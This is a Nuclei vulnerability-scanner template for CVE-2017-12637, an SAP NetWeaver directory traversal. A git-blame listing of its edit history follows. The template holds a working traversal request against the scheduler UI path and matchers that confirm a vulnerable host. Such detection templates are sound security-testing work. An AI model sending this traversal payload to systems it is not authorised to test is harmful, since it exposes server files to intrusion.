nuclei-templates/cves/2017/CVE-2017-12637.yaml

id: CVE-2017-12637

info:
  name: Directory traversal vulnerability in SAP NetWeaver Application Server Java 7.5
  author: apt-mirror
  severity: high
  description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
  tags: cve,cve2017,sap,lfi
  reference:
    - https://www.cvedetails.com/cve/CVE-2017-12637/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-12637
    - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf

requests:
  - method: GET
    path:
      - "{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.."
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "WEB-INF"
          - "META-INF"
        condition: and
        part: body
cve id updates 2021-01-02 05:02:50 +00:00			`id: CVE-2017-12637`
cve-2017-12637.yaml added 2020-11-17 10:14:41 +00:00
			`info:`
			`name: Directory traversal vulnerability in SAP NetWeaver Application Server Java 7.5`
			`author: apt-mirror`
			`severity: high`
			`description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.`
tag improvements 2021-03-18 07:54:36 +00:00			`tags: cve,cve2017,sap,lfi`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`- https://www.cvedetails.com/cve/CVE-2017-12637/`
			`- https://nvd.nist.gov/vuln/detail/CVE-2017-12637`
			`- https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf`
cve-2017-12637.yaml added 2020-11-17 10:14:41 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.."`
			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: word`
			`words:`
			`- "WEB-INF"`
			`- "META-INF"`
cve-2017-12637.yaml tab fixed 2020-11-17 10:18:19 +00:00			`condition: and`
cve-2017-12637.yaml added 2020-11-17 10:14:41 +00:00			`part: body`